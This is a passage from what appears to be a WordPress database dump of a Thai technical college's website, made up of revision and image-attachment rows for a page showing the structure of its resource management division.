src=\"/wp-content/uploads/2018/03/5-3-2561-12-34-40.jpg\" alt=\"\" width=\"375\" height=\"100\" />\r\n\r\n<img class=\"aligncenter wp-image-1475 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-44-12.jpg\" alt=\"\" width=\"671\" height=\"319\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-1477\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-51-11.jpg\" alt=\"\" width=\"192\" height=\"239\" />\r\n\r\n<img class=\"aligncenter wp-image-1478 \" src=\"/wp-content/uploads/2018/03/5-3-2561-12-52-08.jpg\" alt=\"\" width=\"375\" height=\"104\" />\r\n\r\n<img class=\"aligncenter wp-image-1480 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-13-22-38.jpg\" alt=\"\" width=\"461\" height=\"312\" />\r\n\r\n \r\n\r\n ', 'โครงสร้างฝ่ายบริหารทรัพยากร', '', 'inherit', 'closed', 'closed', '', '1451-revision-v1', '', '', '2018-03-05 13:22:30', '2018-03-05 06:22:30', '', 1451, 'http://www.technicrayong.ac.th/1451-revision-v1/', 0, 'revision', '', 0),
(1483, 3, '2018-03-05 13:29:20', '2018-03-05 06:29:20', '', '5-3-2561 13-31-01', '', 'inherit', 'closed', 'closed', '', '5-3-2561-13-31-01', '', '', '2018-03-05 13:29:20', '2018-03-05 06:29:20', '', 1451, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/03/5-3-2561-13-31-01.jpg', 0, 'attachment', 'image/jpeg', 0),
(1484, 3, '2018-03-05 13:30:52', '2018-03-05 06:30:52', '<img class=\"aligncenter wp-image-1454 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-10-23-29.jpg\" alt=\"\" width=\"190\" height=\"238\" />\r\n\r\n<img class=\"aligncenter wp-image-1452 \" src=\"/wp-content/uploads/2018/03/นายกิตติพงค์-อุตตมะเวทิน.jpg\" alt=\"\" width=\"376\" height=\"104\" />\r\n\r\n<img class=\"aligncenter wp-image-1456 \" src=\"/wp-content/uploads/2018/03/นางรุจิรดานันท์-พันกาฬสินธุ์.jpg\" alt=\"\" width=\"382\" height=\"107\" /><img class=\"aligncenter wp-image-1466 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-10-57-29.jpg\" alt=\"\" width=\"920\" height=\"314\" /><img class=\"aligncenter size-full wp-image-1469\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-25-12.jpg\" alt=\"\" width=\"195\" height=\"239\" />\r\n\r\n<img class=\"aligncenter wp-image-1467\" src=\"/wp-content/uploads/2018/03/5-3-2561-11-04-59.jpg\" alt=\"\" width=\"376\" height=\"104\" />\r\n\r\n<img class=\"aligncenter wp-image-1468 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-22-07.jpg\" alt=\"\" width=\"717\" height=\"321\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-1472\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-33-56.jpg\" alt=\"\" width=\"193\" height=\"242\" />\r\n\r\n<img class=\"aligncenter wp-image-1473\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-34-40.jpg\" alt=\"\" width=\"375\" height=\"100\" />\r\n\r\n<img class=\"aligncenter wp-image-1475 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-44-12.jpg\" alt=\"\" width=\"671\" height=\"319\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-1477\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-51-11.jpg\" alt=\"\" width=\"192\" height=\"239\" />\r\n\r\n<img class=\"aligncenter wp-image-1478 \" src=\"/wp-content/uploads/2018/03/5-3-2561-12-52-08.jpg\" alt=\"\" width=\"375\" height=\"104\" />\r\n\r\n<img class=\"aligncenter wp-image-1480 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-13-22-38.jpg\" alt=\"\" width=\"461\" height=\"312\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-1482\" src=\"/wp-content/uploads/2018/03/5-3-2561-13-30-31.jpg\" alt=\"\" width=\"193\" height=\"240\" />\r\n\r\n<img class=\"aligncenter wp-image-1483 \" src=\"/wp-content/uploads/2018/03/5-3-2561-13-31-01.jpg\" alt=\"\" width=\"376\" height=\"102\" />\r\n\r\n \r\n\r\n ', 'โครงสร้างฝ่ายบริหารทรัพยากร', '', 'inherit', 'closed', 'closed', '', '1451-revision-v1', '', '', '2018-03-05 13:30:52', '2018-03-05 06:30:52', '', 1451, 'http://www.technicrayong.ac.th/1451-revision-v1/', 0, 'revision', '', 0),
(1488, 3, '2018-03-05 14:25:48', '2018-03-05 07:25:48', '<img class=\"aligncenter wp-image-1454 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-10-23-29.jpg\" alt=\"\" width=\"190\" height=\"238\" />\r\n\r\n<img class=\"aligncenter wp-image-1452 \" src=\"/wp-content/uploads/2018/03/นายกิตติพงค์-อุตตมะเวทิน.jpg\" alt=\"\" width=\"376\" height=\"104\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-1485\" src=\"/wp-content/uploads/2018/03/5-3-2561-13-45-54.jpg\" alt=\"\" width=\"195\" height=\"238\" />\r\n\r\n<img class=\"aligncenter wp-image-1456 \" src=\"/wp-content/uploads/2018/03/นางรุจิรดานันท์-พันกาฬสินธุ์.jpg\" alt=\"\" width=\"382\" height=\"107\" /><img class=\"aligncenter wp-image-1466 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-10-57-29.jpg\" alt=\"\" width=\"920\" height=\"314\" /><img class=\"aligncenter size-full wp-image-1469\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-25-12.jpg\" alt=\"\" width=\"195\" height=\"239\" />\r\n\r\n<img class=\"aligncenter wp-image-1467\" src=\"/wp-content/uploads/2018/03/5-3-2561-11-04-59.jpg\" alt=\"\" width=\"376\" height=\"104\" />\r\n\r\n<img class=\"aligncenter wp-image-1468 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-22-07.jpg\" alt=\"\" width=\"717\" height=\"321\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-1472\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-33-56.jpg\" alt=\"\" width=\"193\" height=\"242\" />\r\n\r\n<img class=\"aligncenter wp-image-1473\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-34-40.jpg\" alt=\"\" width=\"375\" height=\"100\" />\r\n\r\n<img class=\"aligncenter wp-image-1475 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-44-12.jpg\" alt=\"\" width=\"671\" height=\"319\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-1477\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-51-11.jpg\" alt=\"\" width=\"192\" height=\"239\" />\r\n\r\n<img class=\"aligncenter wp-image-1478 \" src=\"/wp-content/uploads/2018/03/5-3-2561-12-52-08.jpg\" alt=\"\" width=\"375\" height=\"104\" />\r\n\r\n<img class=\"aligncenter wp-image-1480 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-13-22-38.jpg\" alt=\"\" width=\"461\" height=\"312\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-1482\" src=\"/wp-content/uploads/2018/03/5-3-2561-13-30-31.jpg\" alt=\"\" width=\"193\" height=\"240\" />\r\n\r\n<img class=\"aligncenter wp-image-1483 \" src=\"/wp-content/uploads/2018/03/5-3-2561-13-31-01.jpg\" alt=\"\" width=\"376\" height=\"102\" />\r\n\r\n<img class=\"aligncenter wp-image-1487 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-14-26-46.jpg\" alt=\"\" width=\"731\" height=\"647\" />\r\n\r\n \r\n\r\n ', 'โครงสร้างฝ่ายบริหารทรัพยากร', '', 'inherit', 'closed', 'closed', '', '1451-revision-v1', '', '', '2018-03-05 14:25:48', '2018-03-05 07:25:48', '', 1451, 'http://www.technicrayong.ac.th/1451-revision-v1/', 0, 'revision', '', 0),
(1490, 3, '2018-03-05 14:29:40', '2018-03-05 07:29:40', '<img class=\"aligncenter size-medium wp-image-1489\" src=\"/wp-content/uploads/2018/03/213114124-300x263.jpg\" alt=\"\" width=\"300\" height=\"263\" /><img class=\"aligncenter wp-image-1454 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-10-23-29.jpg\" alt=\"\" width=\"190\" height=\"238\" />\r\n\r\n<img class=\"aligncenter wp-image-1452 \" src=\"/wp-content/uploads/2018/03/นายกิตติพงค์-อุตตมะเวทิน.jpg\" alt=\"\" width=\"376\" height=\"104\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-1485\" src=\"/wp-content/uploads/2018/03/5-3-2561-13-45-54.jpg\" alt=\"\" width=\"195\" height=\"238\" />\r\n\r\n<img class=\"aligncenter wp-image-1456 \" src=\"/wp-content/uploads/2018/03/นางรุจิรดานันท์-พันกาฬสินธุ์.jpg\" alt=\"\" width=\"382\" height=\"107\" /><img class=\"aligncenter wp-image-1466 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-10-57-29.jpg\" alt=\"\" width=\"920\" height=\"314\" /><img class=\"aligncenter size-full wp-image-1469\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-25-12.jpg\" alt=\"\" width=\"195\" height=\"239\" />\r\n\r\n<img class=\"aligncenter wp-image-1467\" src=\"/wp-content/uploads/2018/03/5-3-2561-11-04-59.jpg\" alt=\"\" width=\"376\" height=\"104\" />\r\n\r\n<img class=\"aligncenter wp-image-1468 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-22-07.jpg\" alt=\"\" width=\"717\" height=\"321\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-1472\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-33-56.jpg\" alt=\"\" width=\"193\" height=\"242\" />\r\n\r\n<img class=\"aligncenter wp-image-1473\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-34-40.jpg\" alt=\"\" width=\"375\" height=\"100\" />\r\n\r\n<img class=\"aligncenter wp-image-1475 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-44-12.jpg\" alt=\"\" width=\"671\" height=\"319\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-1477\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-51-11.jpg\" alt=\"\" width=\"192\" height=\"239\" />\r\n\r\n<img class=\"aligncenter wp-image-1478 \" src=\"/wp-content/uploads/2018/03/5-3-2561-12-52-08.jpg\" alt=\"\" width=\"375\" height=\"104\" />\r\n\r\n<img class=\"aligncenter wp-image-1480 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-13-22-38.jpg\" alt=\"\" width=\"461\" height=\"312\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-1482\" src=\"/wp-content/uploads/2018/03/5-3-2561-13-30-31.jpg\" alt=\"\" width=\"193\" height=\"240\" />\r\n\r\n<img class=\"aligncenter wp-image-1483 \" src=\"/wp-content/uploads/2018/03/5-3-2561-13-31-01.jpg\" alt=\"\" width=\"376\" height=\"102\" />\r\n\r\n<img class=\"aligncenter wp-image-1489 size-full\" src=\"/wp-content/uploads/2018/03/213114124.jpg\" alt=\"\" width=\"731\" height=\"640\" />\r\n\r\n \r\n\r\n ', 'โครงสร้างฝ่ายบริหารทรัพยากร', '', 'inherit', 'closed', 'closed', '', '1451-revision-v1', '', '', '2018-03-05 14:29:40', '2018-03-05 07:29:40', '', 1451, 'http://www.technicrayong.ac.th/1451-revision-v1/', 0, 'revision', '', 0),
(1491, 3, '2018-03-05 14:29:59', '2018-03-05 07:29:59', '<img class=\"aligncenter wp-image-1454 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-10-23-29.jpg\" alt=\"\" width=\"190\" height=\"238\" />\r\n\r\n<img class=\"aligncenter wp-image-1452 \" src=\"/wp-content/uploads/2018/03/นายกิตติพงค์-อุตตมะเวทิน.jpg\" alt=\"\" width=\"376\" height=\"104\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-1485\" src=\"/wp-content/uploads/2018/03/5-3-2561-13-45-54.jpg\" alt=\"\" width=\"195\" height=\"238\" />\r\n\r\n<img class=\"aligncenter wp-image-1456 \" src=\"/wp-content/uploads/2018/03/นางรุจิรดานันท์-พันกาฬสินธุ์.jpg\" alt=\"\" width=\"382\" height=\"107\" /><img class=\"aligncenter wp-image-1466 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-10-57-29.jpg\" alt=\"\" width=\"920\" height=\"314\" /><img class=\"aligncenter size-full wp-image-1469\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-25-12.jpg\" alt=\"\" width=\"195\" height=\"239\" />\r\n\r\n<img class=\"aligncenter wp-image-1467\" src=\"/wp-content/uploads/2018/03/5-3-2561-11-04-59.jpg\" alt=\"\" width=\"376\" height=\"104\" />\r\n\r\n<img class=\"aligncenter wp-image-1468 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-22-07.jpg\" alt=\"\" width=\"717\" height=\"321\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-1472\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-33-56.jpg\" alt=\"\" width=\"193\" height=\"242\" />\r\n\r\n<img class=\"aligncenter wp-image-1473\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-34-40.jpg\" alt=\"\" width=\"375\" height=\"100\" />\r\n\r\n<img class=\"aligncenter wp-image-1475 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-44-12.jpg\" alt=\"\" width=\"671\" height=\"319\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-1477\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-51-11.jpg\" alt=\"\" width=\"192\" height=\"239\" />\r\n\r\n<img class=\"aligncenter wp-image-1478 \" src=\"/wp-content/uploads/2018/03/5-3-2561-12-52-08.jpg\" alt=\"\" width=\"375\" height=\"104\" />\r\n\r\n<img class=\"aligncenter wp-image-1480 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-13-22-38.jpg\" alt=\"\" width=\"461\" height=\"312\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-1482\" src=\"/wp-content/uploads/2018/03/5-3-2561-13-30-31.jpg\" alt=\"\" width=\"193\" height=\"240\" />\r\n\r\n<img class=\"aligncenter wp-image-1483 \" src=\"/wp-content/uploads/2018/03/5-3-2561-13-31-01.jpg\" alt=\"\" width=\"376\" height=\"102\" />\r\n\r\n<img class=\"aligncenter wp-image-1489 size-full\" src=\"/wp-content/uploads/2018/03/213114124.jpg\" alt=\"\" width=\"731\" height=\"640\" />\r\n\r\n \r\n\r\n ', 'โครงสร้างฝ่ายบริหารทรัพยากร', '', 'inherit', 'closed', 'closed', '', '1451-revision-v1', '', '', '2018-03-05 14:29:59', '2018-03-05 07:29:59', '', 1451, 'http://www.technicrayong.ac.th/1451-revision-v1/', 0, 'revision', '', 0),
(1493, 3, '2018-03-05 14:51:25', '2018-03-05 07:51:25', '', '5-3-2561 14-52-41', '', 'inherit', 'closed', 'closed', '', '5-3-2561-14-52-41', '', '', '2018-03-05 14:51:25', '2018-03-05 07:51:25', '', 1451, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/03/5-3-2561-14-52-41.jpg', 0, 'attachment', 'image/jpeg', 0),
(1496, 3, '2018-03-05 15:40:36', '2018-03-05 08:40:36', '', '5-3-2561 15-42-18', '', 'inherit', 'closed', 'closed', '', '5-3-2561-15-42-18', '', '', '2018-03-05 15:40:36', '2018-03-05 08:40:36', '', 1451, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/03/5-3-2561-15-42-18.jpg', 0, 'attachment', 'image/jpeg', 0),
(1497, 3, '2018-03-05 15:41:26', '2018-03-05 08:41:26', '<img class=\"aligncenter wp-image-1454 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-10-23-29.jpg\" alt=\"\" width=\"190\" height=\"238\" />\r\n\r\n<img class=\"aligncenter wp-image-1452 \" src=\"/wp-content/uploads/2018/03/นายกิตติพงค์-อุตตมะเวทิน.jpg\" alt=\"\" width=\"376\" height=\"104\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-1485\" src=\"/wp-content/uploads/2018/03/5-3-2561-13-45-54.jpg\" alt=\"\" width=\"195\" height=\"238\" />\r\n\r\n<img class=\"aligncenter wp-image-1456 \" src=\"/wp-content/uploads/2018/03/นางรุจิรดานันท์-พันกาฬสินธุ์.jpg\" alt=\"\" width=\"382\" height=\"107\" /><img class=\"aligncenter wp-image-1466 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-10-57-29.jpg\" alt=\"\" width=\"920\" height=\"314\" /><img class=\"aligncenter size-full wp-image-1469\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-25-12.jpg\" alt=\"\" width=\"195\" height=\"239\" />\r\n\r\n<img class=\"aligncenter wp-image-1467\" src=\"/wp-content/uploads/2018/03/5-3-2561-11-04-59.jpg\" alt=\"\" width=\"376\" height=\"104\" />\r\n\r\n<img class=\"aligncenter wp-image-1468 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-22-07.jpg\" alt=\"\" width=\"717\" height=\"321\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-1472\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-33-56.jpg\" alt=\"\" width=\"193\" height=\"242\" />\r\n\r\n<img class=\"aligncenter wp-image-1473\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-34-40.jpg\" alt=\"\" width=\"375\" height=\"100\" />\r\n\r\n<img class=\"aligncenter wp-image-1475 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-44-12.jpg\" alt=\"\" width=\"671\" height=\"319\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-1477\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-51-11.jpg\" alt=\"\" width=\"192\" height=\"239\" />\r\n\r\n<img class=\"aligncenter wp-image-1478 \" src=\"/wp-content/uploads/2018/03/5-3-2561-12-52-08.jpg\" alt=\"\" width=\"375\" height=\"104\" />\r\n\r\n<img class=\"aligncenter wp-image-1480 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-13-22-38.jpg\" alt=\"\" width=\"461\" height=\"312\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-1482\" src=\"/wp-content/uploads/2018/03/5-3-2561-13-30-31.jpg\" alt=\"\" width=\"193\" height=\"240\" />\r\n\r\n<img class=\"aligncenter wp-image-1483 \" src=\"/wp-content/uploads/2018/03/5-3-2561-13-31-01.jpg\" alt=\"\" width=\"376\" height=\"102\" />\r\n\r\n<img class=\"aligncenter wp-image-1489 size-full\" src=\"/wp-content/uploads/2018/03/213114124.jpg\" alt=\"\" width=\"731\" height=\"640\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-1492\" src=\"/wp-content/uploads/2018/03/5-3-2561-14-52-22.jpg\" alt=\"\" width=\"191\" height=\"236\" />\r\n\r\n<img class=\"aligncenter wp-image-1493 \" src=\"/wp-content/uploads/2018/03/5-3-2561-14-52-41.jpg\" alt=\"\" width=\"382\" height=\"102\" />\r\n\r\n<img class=\"aligncenter wp-image-1494 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-15-36-36.jpg\" alt=\"\" width=\"496\" height=\"330\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-1495\" src=\"/wp-content/uploads/2018/03/5-3-2561-15-41-43.jpg\" alt=\"\" width=\"191\" height=\"238\" />\r\n\r\n<img class=\"aligncenter wp-image-1496\" src=\"/wp-content/uploads/2018/03/5-3-2561-15-42-18.jpg\" alt=\"\" width=\"384\" height=\"105\" />\r\n\r\n \r\n\r\n \r\n\r\n ', 'โครงสร้างฝ่ายบริหารทรัพยากร', '', 'inherit', 'closed', 'closed', '', '1451-revision-v1', '', '', '2018-03-05 15:41:26', '2018-03-05 08:41:26', '', 1451, 'http://www.technicrayong.ac.th/1451-revision-v1/', 0, 'revision', '', 0),
(1501, 3, '2018-03-06 08:53:57', '2018-03-06 01:53:57', '<img class=\"aligncenter wp-image-1454 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-10-23-29.jpg\" alt=\"\" width=\"190\" height=\"238\" />\r\n\r\n<img class=\"aligncenter wp-image-1452 \" src=\"/wp-content/uploads/2018/03/นายกิตติพงค์-อุตตมะเวทิน.jpg\" alt=\"\" width=\"376\" height=\"104\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-1485\" src=\"/wp-content/uploads/2018/03/5-3-2561-13-45-54.jpg\" alt=\"\" width=\"195\" height=\"238\" />\r\n\r\n<img class=\"aligncenter wp-image-1456 \" src=\"/wp-content/uploads/2018/03/นางรุจิรดานันท์-พันกาฬสินธุ์.jpg\" alt=\"\" width=\"382\" height=\"107\" /><img class=\"aligncenter wp-image-1466 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-10-57-29.jpg\" alt=\"\" width=\"920\" height=\"314\" /><img class=\"aligncenter size-full wp-image-1469\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-25-12.jpg\" alt=\"\" width=\"195\" height=\"239\" />\r\n\r\n<img class=\"aligncenter wp-image-1467\" src=\"/wp-content/uploads/2018/03/5-3-2561-11-04-59.jpg\" alt=\"\" width=\"376\" height=\"104\" />\r\n\r\n<img class=\"aligncenter wp-image-1468 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-22-07.jpg\" alt=\"\" width=\"717\" height=\"321\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-1472\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-33-56.jpg\" alt=\"\" width=\"193\" height=\"242\" />\r\n\r\n<img class=\"aligncenter wp-image-1473\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-34-40.jpg\" alt=\"\" width=\"375\" height=\"100\" />\r\n\r\n<img class=\"aligncenter wp-image-1475 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-44-12.jpg\" alt=\"\" width=\"671\" height=\"319\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-1477\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-51-11.jpg\" alt=\"\" width=\"192\" height=\"239\" />\r\n\r\n<img class=\"aligncenter wp-image-1478 \" src=\"/wp-content/uploads/2018/03/5-3-2561-12-52-08.jpg\" alt=\"\" width=\"375\" height=\"104\" />\r\n\r\n<img class=\"aligncenter wp-image-1480 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-13-22-38.jpg\" alt=\"\" width=\"461\" height=\"312\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-1482\" src=\"/wp-content/uploads/2018/03/5-3-2561-13-30-31.jpg\" alt=\"\" width=\"193\" height=\"240\" />\r\n\r\n<img class=\"aligncenter wp-image-1483 \" src=\"/wp-content/uploads/2018/03/5-3-2561-13-31-01.jpg\" alt=\"\" width=\"376\" height=\"102\" />\r\n\r\n<img class=\"aligncenter wp-image-1489 size-full\" src=\"/wp-content/uploads/2018/03/213114124.jpg\" alt=\"\" width=\"731\" height=\"640\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-1492\" src=\"/wp-content/uploads/2018/03/5-3-2561-14-52-22.jpg\" alt=\"\" width=\"191\" height=\"236\" />\r\n\r\n<img class=\"aligncenter wp-image-1493 \" src=\"/wp-content/uploads/2018/03/5-3-2561-14-52-41.jpg\" alt=\"\" width=\"382\" height=\"102\" />\r\n\r\n<img class=\"aligncenter wp-image-1494 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-15-36-36.jpg\" alt=\"\" width=\"496\" height=\"330\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-1495\" src=\"/wp-content/uploads/2018/03/5-3-2561-15-41-43.jpg\" alt=\"\" width=\"191\" height=\"238\" />\r\n\r\n<img class=\"aligncenter wp-image-1496\" src=\"/wp-content/uploads/2018/03/5-3-2561-15-42-18.jpg\" alt=\"\" width=\"384\" height=\"105\" />\r\n\r\n<img class=\"aligncenter wp-image-1499 size-full\" src=\"/wp-content/uploads/2018/03/6-3-2561-8-52-54.jpg\" alt=\"\" width=\"720\" height=\"633\" />\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n ', 'โครงสร้างฝ่ายบริหารทรัพยากร', '', 'inherit', 'closed', 'closed', '', '1451-revision-v1', '', '', '2018-03-06 08:53:57', '2018-03-06 01:53:57', '', 1451, 'http://www.technicrayong.ac.th/1451-revision-v1/', 0, 'revision', '', 0),
(1503, 3, '2018-03-06 09:33:29', '2018-03-06 02:33:29', '', '6-3-2561 9-34-49', '', 'inherit', 'closed', 'closed', '', '6-3-2561-9-34-49', '', '', '2018-03-06 09:33:29', '2018-03-06 02:33:29', '', 1451, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/03/6-3-2561-9-34-49.jpg', 0, 'attachment', 'image/jpeg', 0),
(1505, 3, '2018-03-06 09:37:51', '2018-03-06 02:37:51', '<img class=\"aligncenter wp-image-1454 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-10-23-29.jpg\" alt=\"\" width=\"190\" height=\"238\" />\r\n\r\n<img class=\"aligncenter wp-image-1452 \" src=\"/wp-content/uploads/2018/03/นายกิตติพงค์-อุตตมะเวทิน.jpg\" alt=\"\" width=\"376\" height=\"104\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-1485\" src=\"/wp-content/uploads/2018/03/5-3-2561-13-45-54.jpg\" alt=\"\" width=\"195\" height=\"238\" />\r\n\r\n<img class=\"aligncenter wp-image-1456 \" src=\"/wp-content/uploads/2018/03/นางรุจิรดานันท์-พันกาฬสินธุ์.jpg\" alt=\"\" width=\"382\" height=\"107\" /><img class=\"aligncenter wp-image-1466 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-10-57-29.jpg\" alt=\"\" width=\"920\" height=\"314\" /><img class=\"aligncenter size-full wp-image-1469\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-25-12.jpg\" alt=\"\" width=\"195\" height=\"239\" />\r\n\r\n<img class=\"aligncenter wp-image-1467\" src=\"/wp-content/uploads/2018/03/5-3-2561-11-04-59.jpg\" alt=\"\" width=\"376\" height=\"104\" />\r\n\r\n<img class=\"aligncenter wp-image-1468 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-22-07.jpg\" alt=\"\" width=\"717\" height=\"321\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-1472\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-33-56.jpg\" alt=\"\" width=\"193\" height=\"242\" />\r\n\r\n<img class=\"aligncenter wp-image-1473\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-34-40.jpg\" alt=\"\" width=\"375\" height=\"100\" />\r\n\r\n<img class=\"aligncenter wp-image-1475 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-44-12.jpg\" alt=\"\" width=\"671\" height=\"319\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-1477\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-51-11.jpg\" alt=\"\" width=\"192\" height=\"239\" />\r\n\r\n<img class=\"aligncenter wp-image-1478 \" src=\"/wp-content/uploads/2018/03/5-3-2561-12-52-08.jpg\" alt=\"\" width=\"375\" height=\"104\" />\r\n\r\n<img class=\"aligncenter wp-image-1480 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-13-22-38.jpg\" alt=\"\" width=\"461\" height=\"312\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-1482\" src=\"/wp-content/uploads/2018/03/5-3-2561-13-30-31.jpg\" alt=\"\" width=\"193\" height=\"240\" />\r\n\r\n<img class=\"aligncenter wp-image-1483 \" src=\"/wp-content/uploads/2018/03/5-3-2561-13-31-01.jpg\" alt=\"\" width=\"376\" height=\"102\" />\r\n\r\n<img class=\"aligncenter wp-image-1489 size-full\" src=\"/wp-content/uploads/2018/03/213114124.jpg\" alt=\"\" width=\"731\" height=\"640\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-1492\" src=\"/wp-content/uploads/2018/03/5-3-2561-14-52-22.jpg\" alt=\"\" width=\"191\" height=\"236\" />\r\n\r\n<img class=\"aligncenter wp-image-1493 \" src=\"/wp-content/uploads/2018/03/5-3-2561-14-52-41.jpg\" alt=\"\" width=\"382\" height=\"102\" />\r\n\r\n<img class=\"aligncenter wp-image-1494 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-15-36-36.jpg\" alt=\"\" width=\"496\" height=\"330\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-1495\" src=\"/wp-content/uploads/2018/03/5-3-2561-15-41-43.jpg\" alt=\"\" width=\"191\" height=\"238\" />\r\n\r\n<img class=\"aligncenter wp-image-1496\" src=\"/wp-content/uploads/2018/03/5-3-2561-15-42-18.jpg\" alt=\"\" width=\"384\" height=\"105\" />\r\n\r\n<img class=\"aligncenter wp-image-1499 size-full\" src=\"/wp-content/uploads/2018/03/6-3-2561-8-52-54.jpg\" alt=\"\" width=\"720\" height=\"633\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-1502\" src=\"/wp-content/uploads/2018/03/6-3-2561-9-33-55.jpg\" alt=\"\" width=\"189\" height=\"235\" />\r\n\r\n<img class=\"aligncenter wp-image-1503 \" src=\"/wp-content/uploads/2018/03/6-3-2561-9-34-49.jpg\" alt=\"\" width=\"362\" height=\"98\" />\r\n\r\n<img class=\"aligncenter wp-image-1504\" src=\"/wp-content/uploads/2018/03/6-3-2561-9-38-38.jpg\" alt=\"\" width=\"290\" height=\"347\" />\r\n\r\n \r\n\r\n \r\n\r\n ', 'โครงสร้างฝ่ายบริหารทรัพยากร', '', 'inherit', 'closed', 'closed', '', '1451-revision-v1', '', '', '2018-03-06 09:37:51', '2018-03-06 02:37:51', '', 1451, 'http://www.technicrayong.ac.th/1451-revision-v1/', 0, 'revision', '', 0),
